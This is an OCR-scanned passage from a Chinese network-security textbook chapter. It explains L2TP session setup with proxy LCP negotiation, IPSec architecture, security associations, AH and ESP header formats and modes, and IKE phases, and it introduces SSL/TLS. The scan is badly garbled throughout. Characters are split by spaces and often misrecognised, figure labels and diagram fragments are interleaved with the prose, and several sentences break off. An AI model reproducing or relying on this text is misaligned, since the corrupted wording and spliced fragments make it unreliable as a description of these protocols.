会 话 建立 过 程 由 呼叫 触发 ,在 拨号 接 入 的 情况 下 ,就 是 由 用 户 至 LAC 的 入 呼叫 触发 ， 
其 过 程 如 图 12. 6 所 示 , 由 呼叫 管理 类 消息 实现 ,类 似 隧 道 建立 ,消息 过 程 将 交换 如 下 信息 : 
LAC 和 LNS 各 自 为 会 话 分 配 的 会 话 ID; 数据 信道 的 承载 类 型 和 帧 封装 类 型 ; 主 被 叫 号 码 
及 子 地 址 ; 收发 线路 速率 ; 数据 消息 是 否 要 加 序号 。 

在 拨号 接 入 时 ,虽然 PPP 的 终点 是 在 LNS, 但 LAC 亦 LAc LNS 
可 根据 需要 与 远 端 系统 进行 LCP 协商 和 认证 , 称 为 代理 
LCP 协商 和 认证 。 代 理 协商 的 第 一 个 好 处 是 便于 支持 ISP 
选择 接 入 。LAC 在 协商 过 程 中 请 求 用 户 名 和 口令 ,用 户 名 ZLB 证 实 
约定 采用 域名 形式 ,如 abc@ISPn. com,LAC 检查 用 户 名 
中 的 域名 部 分 就 可 知道 应 将 此 接 入 接 至 ISPn。 代 理 协 商 
的 另 一 个 好 处 是 可 以 减轻 LNS 的 负担 。LAC 与 用 户 协 商 
完成 后 ,启动 与 LNS 间 的 人 呼叫 会 话 建立 过 程 ,并 在 成 功 消 息 ICCN (Incoming Call 
Connected) 中 ,将 LAC 和 用 户 最 终 交 换 的 LCP 协商 结果 、 用 户 初次 发 送 的 LCP 协商 请 求 、 
以 及 认证 类 型 和 认证 参数 送 给 LNS,LNS 审核 后 可 以 省 略 LCP 协商 过 程 ,如 果 LNS 认为 
LAC 不 可 信任 ,也 可 重新 发 起 和 远 端 系统 的 LCP 协商 。 

如 图 12. 7 所 示 为 LAC 执行 代理 协商 和 认证 的 入 呼叫 接 入 的 协议 过 程 。 图 中 假设 PC 
用 户 经 PSTN (Public Switched Telephone Network) 拨 号 方式 发 起 呼叫 ,用 户 认证 采用 


图 12.6 会 话 建立 过 程 


PAP 算法 。LAC 根据 用 户 名 确定 接 入 的 ISP 并 在 ICCN 消息 中 将 协商 和 认证 结果 传 给 
LNS,LNS 认可 后 将 给 用 户 分 配 动态 IP 地 址 。LNS 还 具有 资源 分 配 功 能 ,如 果 隧 道中 的 呼 
叫 数 已 达到 一 定 限度 ,LNS 可 以 不 再 接受 新 的 呼叫 。 


PC LAC LNS 
PPP LCP Configure-Request | 


PPP LCP Configure-Ack 
PPP LCP Configure-Request 
PPP LCP Configure-Ack 


PAP 用 户 名 /口令 | 
L2TP ICRQ 
L2TP ICRP 
L2TP ICCN 
PAP 证 实 
| 
12.7 L2TP PPP 连接 全 程 建立 过 程 
3) PPP 帧 前 转 


会 话 建立 后 进入 通信 阶段 ,此 时 LAC 收 到 远 端 用 户 发 来 的 PPP 帧 ,去 除 CRC 校 验 字 
段 . 帧 封装 字段 和 规避 字段 ,再 将 其 封装 和 人 L2TP 数据 消息 经 隧道 前 传 给 LNS。 反 向 则 执 
行 相反 的 过 程 。LAC 在 会 话 建立 时 ,可 置 入 需要 有 序 AVP, 则 所 有 数据 消息 必须 加 序号 。 
如 果 LAC 未 作 此 请 求 , 则 由 LNS 控制 。 如 果 LNS 在 发 出 的 消息 中 置 序号 , 则 LAC 在 其 后 
发 出 的 消息 中 亦 置 序号 。 如 果 LNS 不 置 序号 ,LAC 其 后 也 不 再 置 序号 。 


12.2 网 络 层 安全 通信 协议 


从 ISO/OSI 互 联 参考 模型 的 七 层 体系 结构 来 看 ,网 络 层 是 网 络 传输 过 程 中 非常 重要 的 
一 个 功能 层 , 它 主要 负责 网 络 地 址 的 分 配 和 网 络 上 数据 包 的 路 由 选择 。 因 此 ,在 网 络 层 提供 
安全 服务 实现 网 络 的 安全 访问 具有 很 多 先天 性 的 优点 。 常 见 的 安全 认证 ,数据 加 密 、 访 问 控 
制 \ 完 整 性 鉴别 等 ,都 可 以 在 网 络 层 实现 。 该 层 的 安全 协议 主要 有 IPSec 等 。 

在 网 络 层 提供 安全 机 制 的 优点 在 于 : 在 网 络 层 提供 安全 服务 具有 透明 性 , 即 网 络 层 上 
不 同安 全 服务 的 提供 不 需要 应 用 程序 .其 他 通信 层次 和 网 络 部 件 做 任何 修改 ; 密 钥 协商 的 
开销 相对 来 说 很 小 。 因 为 多 种 传送 协议 和 应 用 程序 都 可 以 共享 由 网 络 层 提供 的 密 钥 管理 机 
制 ; 对 任何 传输 层 协议 都 能 为 其 "无 颖 ?地 提供 安全 保障 ; 可 以 以 此 为 基础 构建 虚拟 专用 网 
(VPN) 和 企业 内 部 网 (Intranet) 。 由 于 VPN 和 Intranet 是 以 子 网 为 基础 的 ,而 网 络 层 支持 
子 网 为 对 象 的 安全 服务 ,所 以 很 容易 实现 VPN 和 Intranet。 

在 网 络 层 提供 安全 机 制 的 缺点 在 于 很 难 解决 像 数据 的 不 可 否认 之 类 的 问题 。 因 为 若 在 
网 络 层 解决 该 类 问题 , 则 很 难 在 一 个 多 用 户 的 机 器 上 实现 对 每 个 用 户 的 控制 。 但 可 以 在 终 
端 主机 上 提供 相应 的 机 制 实现 以 用 户 为 基础 的 安全 保障 。 

因此 ,通过 上 面 的 比较 .如果 想 要 实现 网 络 安全 服务 而 又 不 愿意 重 写 很 多 系统 和 应 用 程 
序 , 那 么 唯一 可 行 的 方案 就 是 在 比较 低 的 网 络 层 中 加 入 安全 服务 , 它 能 够 提供 所 有 的 配置 方 


网 络 安 会 座 议 


属于 娄 铭 的 网 络 安 全 技术 与 实践 


案 ,如 主机 对 主机 、 路 由 器 对 路 由 器 、 路 由 器 对 主机 。 
12.2.1 IPSec 协议 竺 概述 


IPSec(Jnternet Protocol Security) 是 IETF 为 了 在 IP 层 提 供 通信 安全 而 制定 的 一 套 协 
议 簇 。 它 包括 安全 协议 部 分 和 密 钥 协商 部 分 : 安全 协议 部 分 定义 了 对 通信 的 安全 保护 机 
制 ; 密 钥 协商 部 分 定义 了 如 何 为 安全 协议 协商 保护 参数 以 及 如 何 对 通信 实体 的 身份 进行 
鉴别 。 

IPSec 安全 协议 部 分 给 出 了 封装 安全 载荷 (Encapsulation Security Payload,ESP) 和 鉴 
别 头 (Authentication Header,AH) 两 种 通信 保护 机 制 。 其 中 ESP 机 制 为 通信 提供 机 密 性 
和 完整 性 保护 ,AH 机 制 为 通信 提供 完整 性 保护 。IPSec 密 钥 协商 部 分 使 用 IKE (Internet 
Key Exchange) 协 议 实现 安全 协议 的 自动 安全 参数 协商 ,IKE 协商 的 安全 参数 包括 加 密 机 
制 散 列 机 制 、 认 证 机 制 、.Diffie-Hellman 组 密 钥 资源 以 及 IKE SA 协商 的 时 间 限 制 等 ,同时 
IKE 还 负责 这 些 安全 参数 的 刷新 。 

1. IPSec 安全 体系 结构 

IPSec 安全 体系 结构 是 所 有 具体 实施 方案 的 基础 。 其 中 定义 了 IPSec 提供 的 安全 服务 ， 
使 用 数据 包 如 何 构 建 与 处 理 以 及 IPSec 处 理 与 安全 策略 之 间 如 何 协调 等 。 图 12. 8 简 述 了 
IPSec 安全 体系 结构 各 部 分 的 组 成 及 相互 之 间 的 关系 。 

(1) IPSec 安全 体系 : 包含 了 一 般 的 概念 、 安 全 需 


求 和 定义 ,并 定义 了 IPSec 的 技术 机 制 。 eid 


(2) 安全 封装 载荷 : 覆盖 了 包 加 密 ( 可 选 身 份 验 安全 封装 载荷 验证 头 前 
证 ) 与 ESP 的 使 用 相关 的 包 格式 和 常规 问题 。 一 一 

(3) 验证 头 部 :包括 包 格式 和 使 用 AH 认证 包 的 | | [SRE| [WE 
一 些 相关 约定 。 1 1 

(4) 加 密 算法 : 描述 各 种 加 密 算法 如 何 应 用 于 解释 域 
ESP, 如 DES-CBC、3DES-CBC。 

(5) 验证 算法 : 描述 各 种 身份 验证 算法 如 何 应 用 次 浏 管理 
于 AH 和 ESP。 be 


(6) 解释 域 : 定义 了 如 何 对 通信 数据 进行 转换 ,以 
确保 其 安全 。 其 中 包括 加 密 算法 ,验证 算法 、 密 钥 大 小 图 12.8 IPSec 安全 体系 结构 
(及 其 如 何 演化 ) 以 及 各 种 算法 专用 的 信息 。 

(7) 密 钥 管理 : 密 钥 管 理 的 一 组 方案 其 中 IKE (Internet 密 钥 交 换 协议 ) 是 默认 的 密 钥 
自动 交换 协议 。 

(8) 策略 : 决定 两 个 实体 之 间 能 否 通信 以 及 如 何 进行 通信 ,策略 的 核心 由 3 部 分 组 成 : 
SA、SAD、SPD, 策 略 部 分 是 唯一 尚未 成 为 标准 的 组 件 。 

2. IPSec 在 TCP/IP 协议 乱 中 的 位 置 

IPSec 协议 得 在 TCP/IP 协议 层 中 的 位 置 如 图 12.9 所 示 ,AH 和 ESP 协议 都 位 于 网 络 
层 ,IKE 协议 属于 应 用 层 协 议 。 

3. 安全 关联 和 安全 策略 

安全 关联 (Security Associations,SA) 是 构成 IPSec 的 基础 , 它 是 两 个 通信 实体 经 协商 


I 
应 用 层 。 | 名 种 应 用 层 协议 (FTP、TELNET、 SMTP 等 )! | IKE ] ! 
传输 层 安全 参数 索引 (SPD) “ 
ICMP 
网 际 屋 | 本 IP 
| AH ESP 1 ARP RARP 
ER 
网 络 接口 层 与 各 种 网 络 接口 


12.9 IPSec 在 TCP/IP 中 的 位 置 


建立 起 来 的 一 种 协定 。 用 IPSec 保护 一 个 IP 包 之 前 必须 先 建立 一 个 SA, 它 包括 加 密 机 制 、 
散 列 机 制 .Diffie-Hellman 组 ,认证 机 制 、 密 钥 资源 以 及 IKE SA 协商 的 时 间 限 制 等 参数 。 安 
全 关联 可 以 手工 或 动态 建立 。SA 通常 用 一 个 三 元 组 所 安全 参数 索引 SPI (Security 
Parameters Index) ,目的 IP 地 址 ,安全 协议 标识 符 二 唯一 地 表示 ,如 图 12. 10 所 示 。 

学 ”安全 关联 (SA) 


SA 就 是 两 个 IPSec 系统 之 间 的 
通 从 音 内 到 香 连 接 


人 


将 一 个 数据 报 用 一 个 新 的 数据 报 封装 


(Security Parameter Index, IP Destination Address, Security Protocol) 
学 32 比特 ， 用 于 标识 具有 相同 耳 地 址 和 
相同 安全 协议 的 不 同 SA。 

党 可 以 是 普通 下 地 址 ， 也 可 

是 广播 或 者 组 播 地 址 

党 可 以 是 AH 或 者 ESP 


负载 


12.10 安全 关联 SA 


其 中 安全 参数 索引 (SPI) 是 分 配给 安全 联盟 的 比特 串 , 仅 在 本 地 可 用 。 安 全 参数 索引 
在 认证 头 或 封装 安全 载荷 头 中 出 现 ,使 接收 系统 选择 安全 联盟 并 在 其 下 处 理 一 个 收 到 的 报 
文 ; 目的 IP 地 址 是 安全 联盟 的 终端 地 址 ,该 终端 可 以 是 终端 用 户 系统 或 者 诸如 防火 墙 、. 路 
由 器 这 样 的 网 络 系统 ; 安全 协议 标识 符 指示 安全 联盟 用 于 认证 头 还 是 封装 安全 载荷 。 

安全 策略 (Security Policy,SP) 是 IPSec 结构 中 非常 重要 的 组 件 , 它 定义 了 两 个 实体 之 
间 的 安全 通信 特性 ; 定义 了 在 什么 模式 下 使 用 什么 协议 ; 还 定义 了 如 何 对 待 IP 包 。 这 些 特 
性 完全 决定 了 为 通信 数据 提供 的 安全 服务 。 所 有 IPSec 实施 方案 都 会 将 策略 保存 在 安全 策 
略 数据 库 SPDB 中 。 

4. IPSec 处 理 过 程 

如 图 12. 11 所 示 ,IPSec 收 到 一 个 IP 报 文 后 ,车 IP 头 的 下 一 协议 字段 对 应 的 是 IPSec 
协议 , 则 进入 IPSec 的 输入 处 理 。IPSec 输入 模块 执行 如 下 : 

(1) 从 AH 协议 头 或 ESP 协议 头 中 取 安 全 参数 索引 SPI, 并 从 IP 协议 头 中 取得 目标 IP 


网 络 安 全 砂 议 


基于 案例 的 网 络 安 会 技术 与 实践 


地 址 以 及 协议 类 型 。 

(2) 以 三 元 组 过 安全 参数 索引 SPI, 目 的 IP 地 址 ,安全 协议 标识 符 二 为 选择 符 查 询 安 全 
联盟 数据 库 SADB, 得 到 所 需 的 安全 联盟 SA。 

(3) 如 果 查 询 SADB 返回 为 NULL ,表明 记录 出 错 这 个 报 文 被 丢弃 。 

(4) 如 果 查 询 SADB 返回 一 个 SA 项 , 则 根据 该 项 指示 的 变换 策略 调用 相应 的 AH 认 
证 或 ESP 解密 操作 。 

(5) AH 验证 和 ESP 解密 操作 成 功 后 需 检查 对 这 个 报 文 应 用 的 策略 是 否 正 确 , 根 据 验 
证 和 解密 后 数据 报 文 的 内 部 IP 地 址 查询 安全 策略 库 SPDB, 如 果 对 这 个 报 文 的 安全 服务 与 
相应 SPDB 项 相符 则 说 明 处 理 正 确 , 并 将 外 部 IP 头 连同 IPSec 头 一 起 剥 去 ,将 内 部 IP 报 文 
传 回 IP 层 处 理 。 


应 用 层 


应 用 协议 


Socket 


Tranport Protocol(TCP/UDP) 


IP/IPSec(AH 与 ESP) 
链 路 层 


图 12.11 IPSec 处 理 过 程 


说 明 : 如 果 查 询 安 全 联盟 数据 库 可 能 得 到 多 个 SA 项 ,这 时 需要 反复 执行 AH 认证 或 
ESP 解密 操作 ,并 与 相应 SPD 项 指示 的 安全 策略 比较 。 若 有 任何 不 匹配 的 情况 都 需要 将 报 

IPSec 输出 处 理 模 块 以 ( 源 IP 地 址 ,目的 IP 地 址 ,安全 协议 标识 符 端口 号 ) 为 参数 调用 
配置 查询 模块 ,查询 对 应 的 SPDB 策略 。 若 用 户 没有 定义 安全 策略 数据 库 或 者 在 查询 时 未 
找到 对 应 的 SPDB 项 , 则 丢弃 报 文 ,否则 按 以 下 3 种 情况 处 理 : 

(1) 如 果 策 略 指明 需 丢 弃 该 报 文 ,就 返回 IP 层 的 调用 进程 说 明 希 望 丢 弃 该 报 文 。 

(2) 如 果 策 略 指明 无 需 安全 保护 ,就 返回 调用 进程 以 普通 方式 传输 此 报 文 。 

(3) 如 果 策 略 指明 需要 安全 保护 ,这 时 需要 验证 SA 是 否 已 建立 如 果 已 建立 ,就 调用 相 
应 的 ESP 或 AH 函数 对 IP 报 文 进行 变换 处 理 ,并 将 结果 返回 IP 层 调用 进程 (多 个 SA 需要 
进行 多 次 变换 处 理 )。 如 果 SA 尚未 建立 ,策略 引擎 根据 用 户 配置 的 安全 策略 ,通知 Internet 
密 钥 协商 (IKE) 模 块 创建 SA。 


12.2.2 IPSec 协议 和 化 中 的 主要 协议 


1. AHCAuthentieation Header) 
AH 协议 为 IP 报 文 提供 数据 完整 性 、 数 据 源 验证 以 及 可 选择 的 抗 重 放 攻 击 保护 ,但 不 
提供 数据 加 密 服 务 。 对 AH 的 详细 描述 在 RFC 2402 中 。AH 协议 使 用 散 列 技术 来 验证 数 


据 完整 性 和 验证 数据 源 。 常 用 的 散 列 函 数 有 MD5、SHA-1、.HMAC-MD5、HMAC-SHA-1 
等 。 注 意 : AH 不 对 受 保护 的 IP 数据 报 的 任何 部 分 进行 加 密 。 由 于 AH 不 提供 机 密 性 保 
证 ,所 以 它 也 不 需要 加 密 算法 。AH 可 用 来 保护 一 个 上 层 协 议 (传输 模式 ) 或 一 个 完整 的 IP 
数据 报 (隧道 模式 ) , 它 既 可 以 单独 使 用 也 可 以 和 ESP 联合 使 用 。 

AH 由 5 个 固定 长 度 的 域 和 一 个 变 长 的 认证 数据 域 组 成 ,如 图 12. 12 所 示 。 
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图 12.12 AH 头 格式 


(1) 下 一 头 部 : 8 比特 ,标识 认证 头 后 面 的 下 一 个 负载 类 型 。 在 传输 模式 下 , 它 是 受 保 
护 的 上 层 协议 的 分 配 值 ,如 UDP(17) 或 TCP(6) 的 值 在 隧道 模式 下 则 为 4(IPv4) 或 41 
(IPv6) 。 

(2) 有 效 载荷 长 度 : 8 比特 ,表示 以 32 比特 为 单位 的 AH 头 部 长 度 减 2,Default 一 4。 

(3) 保留 : 16 比特 ,保留 将 来 使 用 ,Default 二 0。 

(4) 安全 参数 索引 SPI: 32 比特 的 随机 数 ,用 于 标识 有 相同 IP 地 址 和 相同 安全 协议 的 
不 同 SA。 由 SA 的 创建 者 定义 .只 有 逻辑 意义 。SPI、 目 的 IP 地 址 和 协议 值 组 成 一 个 三 元 
组 ,用 来 唯一 标识 一 个 特定 的 SA, 以便 对 该 数据 包 进 行 安全 处 理 。 

(5) 序列 号 : 32 比特 ,一 个 单项 递增 的 计数 器 ,用 于 防止 重 放 攻 击 ,SA 建立 之 初 初始 化 
为 0, 序列 号 不 允许 重复 。 

(6) 认证 数据 : 是 一 个 可 变 长 字段 , 它 是 认证 算法 对 AH 数据 报 进行 完整 性 计算 所 得 
到 的 完整 性 校 验 值 (Integrity Check Value,ICV)。 为 了 达到 互 操作 目的 ,AH 强制 所 有 的 
IPSec 实现 必须 包含 两 个 MAC: HMAC-MD5-96 和 HMAC-SHA-1-96。 

按照 AH 协议 的 规定 可 以 按 AH 封装 的 协议 数据 不 同 将 AH 封装 划分 为 两 种 模式 : 传 
输 模 式 和 隧道 模式 。 如 果 将 AH 头 插 入 IP 头 和 路 由 扩展 头 之 后 ,上 层 协议 数据 和 端 到 端 扩 
展 头 之 前 , 则 称 这 种 封装 为 传输 模式 ; 如 果 将 AH 头 插 入 原 IP 分 组 的 IP 头 之 前 ,并 在 AH 
头 之 前 插入 新 的 IP 头 , 则 称 这 种 封装 为 隧道 模式 。 

(1) 传输 模式 仅 在 主机 实施 保护 上 层 协 议 ,AH 报头 插 于 IP 报头 和 上 层 协议 之 间 ， 
图 12.13 描述 了 在 IPv4 中 实施 AH 前 后 报 文 的 变换 ,图 12. 14 描述 了 传输 模式 下 AH 认 
证 工作 流程 。 
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图 12.14 AH 认证 工作 流程 


(2) 隧道 模式 可 以 保护 主机 和 网 关 之 间 的 数据 ,在 隧道 模式 中 内 部 IP 头 可 以 是 任意 源 
和 目的 地 址 ,外 部 地 址 是 确定 的 地 址 : 如 安全 网 关 地 址 。AH 用 隧道 模式 保护 的 数据 包 包 
括 内 部 IP 头 部 ,在 通道 模式 中 运用 AH 协议 后 报 文 的 格式 如 图 12. 15 所 示 ,相应 的 通道 模 
式 下 AH 认证 工作 流程 如 图 12. 16 所 示 。 


原始 IP 报 文 IP 头 IP 有 效 载荷 
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1 验证 范围 


12.15 AH 隧道 模式 
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图 12.16 通道 模式 下 AH 认证 工作 流程 


2. ESP(Encapsulating Security Payload) 
ESP 协议 为 保证 重要 数据 在 公 网 传输 时 不 被 他 人 窃取 ,除了 提供 AH 提供 的 所 有 服务 
外 还 提供 数据 加 密 服 务 。 常 用 的 数据 加 密 方 法 有 DES、3DES 等 。ESP 通过 使 用 消息 码 提 
供认 证 服务 ,常用 的 认证 算法 有 HMAC-MD5、HMAC-SHA-1 等 。ESP 是 一 个 通用 的 易 扩 
展 的 安全 机 制 , 它 把 基本 的 ESP 定义 和 实际 提供 安全 服务 的 算法 分 开 。 其 加 密 算法 和 认证 
算法 是 由 ESP 安全 联盟 的 相应 组 件 所 决定 的 。 同 样 ,ESP 通过 插入 一 个 唯一 的 单 向 递增 的 
序列 号 提供 抗 重 放 攻 击 的 服务 。 
分 配给 ESP 的 协议 字段 号 是 50, 不 管 ESP 处 于 什么 模式 ESP 头 都 紧 跟 在 一 个 IP 头 之 
后 。 在 IPv4 中 ,在 IP 头 和 被 保护 的 数据 之 间 插 入 一 个 ESP 头 ,在 被 保护 的 数据 后 加 一 个 
ESP 尾 。 若 IP 头 的 协议 字段 是 50, 则 表明 IP 头 之 后 是 一 个 ESP 头 。 如 图 12. 17 所 示 为 
ESP 的 数据 包 格 式 。 
0 隐 23 31 
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12.17 ESP 头 格式 


(1) 安全 参数 索引 SPI: 与 AH 中 的 SPI 作用 相同 ,用 于 确定 安全 联盟 。SPI 经 过 验 
证 ,但 并 没有 被 加 密 , 因 为 SPI 用 于 状态 的 标识 ,指定 采用 何 种 加 密 算 法 及 密 钥 ,并 用 于 对 包 

(2) 序列 号 : 与 AH 中 一 致 ,用 于 抗 重 放 攻 击 。 它 是 一 个 独一无二 的 、 单 向 递增 的 、 由 
发 送 端 持 在 ESP 头 的 一 个 数 。 

(3) 变 长 载荷 数据 : 这 是 一 个 变 长 字段 ,包含 下 一 个 头 中 所 描述 的 数据 ,这 个 字段 是 必 
需 的 而 且 其 长 度 必须 是 整数 个 字 节 。 如 果 采 用 的 加 密 算 法 需要 初始 化 向 量 , 则 该 数据 要 显 
示 地 包含 在 载荷 数据 中 ,并且 必 须 指定 该 数据 的 长 度 .结构 及 其 在 载荷 中 的 位 置 。 

(4) 填充 项 : 大 多 数 加 密 算法 要 求 输入 数据 包含 整数 个 分 组 ,因此 需要 填充 ,可 选用 于 
在 ESP 中 保证 边界 的 正确 ,其 内 容 由 具体 的 加 密 算 法 决定 。 

(5) 填充 长 度 : 定义 了 前 面 填充 项 所 填充 的 长 度 , 接 收 端 可 据 此 恢复 载荷 数据 的 真实 
长 度 。 

(6) 下 一 头 部 (8-bits) : 标识 受 ESP 保护 的 载荷 的 (协议 ) 类 型 。 在 传输 模式 下 可 为 6 
(CTCP) 或 17 (UDP); 在 通道 模式 可 下 为 4(IPv4) 或 41(IPv6) 。 

(7) 变 长 认证 数据 (完整 性 校 验 值 ICV): 这 是 数据 完整 性 的 检验 结果 ,通常 是 一 个 经 
过 密 钥 处 理 的 散 列 函 数 ,验证 范围 包括 ESP 头 部 、 被 保护 数据 以 及 ESP 尾部 ,长 度 一 整数 
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倍 32 位 比特 。 

ESP 封装 的 两 种 模式 : 传输 模式 和 隧道 模式 。 传 输 模式 仅 用 于 主机 ,用 于 保护 上 层 协 
议 , 但 不 包括 IP 报头 。 在 传输 模式 下 ,ESP 插入 IP 头 和 上 层 协 议 之 间 , 如 TCP、UDP、 
ICMP 或 其 他 IPSec 头 之 前 。 隧 道 模式 用 于 主机 之 间或 安全 网 关 之 间 。 在 隧道 模式 下 , 整 
个 受 保护 的 IP 包 都 封装 在 一 个 ESP 包 中 (包括 完整 的 IP 报头 ), 此 外 还 增加 了 一 个 新 的 
IP 头 。 

(1) 传输 模式 : 只 保护 IP 报 文 的 不 变 部 分 (如 图 12. 18 和 图 12. 19 所 示 ) 。 


原始 IP 报 文 IP 头 IP 有 效 载荷 


加 入 AH 头 后 的 IP 报 文 | “IP 头 | ESp 火 | IP 有 效 载荷 | ESp 尾 ese 


1 一 一 加 机 一 一 ~ 
1 
”验证 范围 一 -| 
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图 12.19 ESP 传输 模式 工作 流程 


(2) 隧道 模式 : 保护 整个 IP 报 文 (如 图 12. 20 和 图 12. 21 所 示 ) 。 


原始 IP 报 文 卫 头 耳 有 效 载荷 


加 入 ESP 头 后 的 IP 报 文 新 下头 ESP 头 IP 头 IP 有 效 载荷 ESP 尾 ESP 验 证 


k 加 密 : 
验证 范围 


y 
3 


“m= 


12. 20 ”ESP 隧道 模式 


3. IKE(Internet Key Exchange) 
Internet 密 钥 交换 协议 (IKE) 是 一 个 以 受 保护 方式 为 SA 协商 并 提供 经 认证 的 密 钥 信 


IP 头 [负载 [ESP 尾 [ESP 认 证 


Source IP=Host A 
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VPN 网 关 2 
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经 过 IPSec 核 心 处 理 以 后 


| 经 过 IPSec 核心 处 理 以 后 
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图 12. 21 ESP 隧道 模式 工作 流程 


息 的 协议 。 用 IPSec 保护 一 个 卫 包 之 前 ,必须 先 建立 一 个 安全 关联 (CSA)。 正 如 前 面 指出 
的 那样 ,SA 可 以 手工 建立 或 动态 建立 。IKE 用 于 动态 建立 SA。IKE 代表 IPSec 对 SA 进 
行 协商 ,并 对 安全 关联 数据 库 (SADB) 进 行 填充 。IKE 由 RFC 2409 文件 描述 。IKE 实际 上 
是 一 种 混合 型 协议 , 它 建立 在 由 Internet 安全 关联 和 密 钥 管理 协议 (Internet Security 
Association and Key Management Protocol,ISAKMP) 定 义 的 一 个 框架 上 。 同 时 IKE 还 实 
现 了 两 种 密 钥 管理 协议 (Oakley 和 SKEME) 的 一 部 分 。 

IKE 协商 的 安全 参数 包括 加 密 机 制 、 散 列 机 制 、 认 证 机 制 .Diffie-Hellman 组 、 密 钥 资 源 
以 及 IKE SA 协商 的 时 间 限 制 等 。 其 交换 的 最 终结 果 是 一 个 通过 验证 的 密 钥 以 及 建立 在 双 
方 同 意 基 础 上 的 安全 联盟 。 由 于 IKE 同时 借鉴 了 ISAKMP SA 中 的 “阶段 "概念 和 
OAKLEY 协议 中 的 “模式 ”概念 ,所 以 在 IKE 的 分 阶段 交换 中 ,每 个 阶段 都 存在 不 同 的 交换 
模式 。IKE 将 密 钥 交换 分 成 两 个 阶段 ,在 第 一 个 阶段 ,就 是 ISAKMP SA 的 建立 阶段 ,通信 
实体 之 间 建 立 一 个 经 过 认证 的 安全 通道 ,用 于 保护 阶段 2 中 消息 的 安全 。 阶 段 1 的 交换 模 
式 有 两 种 ,分 别 是 主 模式 和 积极 模式 。 

(1) 主 模式 实际 上 是 ISAKMP 中 定义 的 身份 保护 交换 模式 的 一 个 具体 实例 化 , 它 提 供 
了 对 交换 实体 的 身份 保护 ,交换 双方 在 主 模式 中 要 交换 三 对 共 六 条 消息 , 头 两 条 消息 进行 
cookie 交换 和 协商 策略 ,包括 加 密 算法 、 散 列 算法 及 认证 方法 等 ; 中 间 两 条 用 于 交换 Diffie- 
Hellman 公开 值 和 一 些 必 要 的 辅助 数据 ,例如 现时 载荷 Nonce 等 ; 最 后 两 条 消息 用 于 验证 
DH 交换 和 身份 信息 。 

(2) 积极 模式 则 是 ISAKMP 中 积极 交换 模式 的 具体 实例 化 ,积极 模式 通常 要 求 交换 三 
条 消息 ,前 两 条 消息 用 于 安全 策略 协商 .交换 DH 公开 值 和 一 些 辅助 数据 ,并 且 在 第 二 条 消 
息 中 还 要 认证 响应 者 的 身份 ; 第 三 条 消息 用 于 对 发 起 者 的 身份 进行 认证 ,并 提供 参与 交换 
的 证 据 。 由 此 可 见 ,积极 模式 能 够 减少 协商 的 步骤 并 加 快 协商 的 过 程 。 
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阶段 2 是 在 阶段 1 建立 起 的 ISAKMP SA 的 基础 上 ,为 特定 的 协议 协商 SA ,用 于 保护 
通信 双方 的 数据 传输 安全 。 阶 段 2 的 交换 模式 为 “快速 交换 模式 ”。 在 阶段 2 中 ,可 由 通信 
的 任何 一 方 发 起 一 个 快速 模式 (Quick Mode) 交 换 , 其 目的 是 建立 针对 某 一 安全 协议 的 SA， 
即 建立 用 于 保护 通信 数据 的 IPSec SA。 一 个 阶段 1 协商 可 以 用 于 保护 多 个 阶段 2 协商 ,一 
个 阶段 2 协商 可 以 同时 请 求 多 个 安全 关联 。 

IKE 交换 的 最 终结 果 是 一 个 通过 验证 的 密 钥 以 及 建立 在 双方 同意 基础 上 的 安全 服务 ， 
一 个 特殊 的 例子 就 是 IPSec 的 安全 关联 ,但 是 IKE 并 非 由 IPSec 专用 ,其 他 任何 协议 都 可 以 
利用 IKE 来 协商 各 自 具体 的 安全 服务 。 


12.3 传输 层 安全 通信 协议 


传输 层 的 任务 就 是 提供 主机 中 两 个 进程 之 间 的 通信 ,其 数据 传输 单位 是 报 文 段 ,而 网 络 
层 是 提供 主机 与 主机 之 间 的 逻辑 通信 。 在 协议 栈 中 ,传输 层 正好 位 于 网 络 层 之 上 ,传输 层 安 
全 协议 是 为 进程 之 间 的 数据 通信 增加 安全 属性 ,如 SSL/TLS 等 。 

在 传输 层 提供 安全 机 制 的 优点 在 于 : 它 不 需要 强制 为 每 个 应 用 作 安 全 方面 的 改进 ; 传 
输 层 能 够 为 不 同 的 通信 应 用 配置 不 同 的 安全 策略 和 密 钥 。 

在 传输 层 提供 安全 机 制 的 缺点 在 于 传输 层 不 可 能 提供 类 似 于 “隧道 "(路 由 器 对 路 由 器 ) 
和 “防火 墙 ”( 路 由 器 对 主机 ) 这 样 的 服务 。 


12.3.1 SSL/TLS 协议 给 


1. SSL/TLS 概述 

1995 年 , Netscape 公司 在 浏览 器 Netscape 1. 1 中 加 入 了 安全 套 接 层 协议 (Secure 
Socket Layer,SSL) ,以 保护 浏览 器 和 Web 服务 器 之 间 重 要 数据 的 传输 ,该 协议 的 第 一 个 成 
熟 的 版 本 是 SSL 2. 0 版 ,并 被 集成 到 Netscape 公司 的 Internet 产品 中 ,包括 Navigator 浏览 
器 和 Web 服务 器 产品 等 。SSL v2.0 的 出 现 ,基本 上 解决 了 Web 通信 协议 的 安全 问题 ,很 
快 引起 了 大 家 的 关注 。1996 年 , Netscape 公司 发 布 了 SSL v3. 0 一 一 draft-freier-ssl- 
version3-02: The SSL Protocol Version 3.0, 该 版 本 的 最 初 实现 增加 了 对 除了 RSA 算法 之 
外 的 其 他 算法 的 支持 和 一 些 安全 特性 ,并 且 修 改 了 前 一 个 版 本 中 的 问题 , 相 比 SSL v2. 0 更 
加 成 熟 和 稳定 ,因此 ,很 快 就 成 为 了 事实 上 的 工业 标准 。1997 年 ,IETF 基于 SSL 协议 发 布 
了 TLS(Transport Layer Secure, 传 输 层 安全 ) 的 Internet 草案 ,Netscape 公司 宣布 支持 该 
开放 标准 。1999 年 ,IETF 正式 发 布 了 TLS 规范 一 一 RFC 2246: TLS Protocol Version 
1.0。 由 于 SSL v3 与 TLS 协议 极其 相似 ,其 主要 区 别 仅 在 于 散 列 函 数 和 密 钥 生成 函数 ,所 
以 在 下 面 的 协议 介绍 中 除了 特别 指出 的 部 分 ,其 内 容 均 适 用 于 两 个 协议 。 

SSL/TLS 协议 是 建立 在 可 靠 连接 (如 TCP) 之 上 的 一 个 能 够 防止 偷 听 、 算 改 和 消息 伪 
造 等 安全 问题 的 协议 。SSL 是 分 层 协议 , 它 对 上 层 传 下 来 的 数据 进行 分 片 一 压缩 一 计算 
MAC-~~ 加 密 , 然 后 数据 发 送 ; 对 收 到 的 数据 则 经 过 解密 一 验证 一 解压 一重 组 之 后 再 分 发 给 
上 层 的 应 用 程序 ,完成 一 次 加 密 通 信 过 程 。 

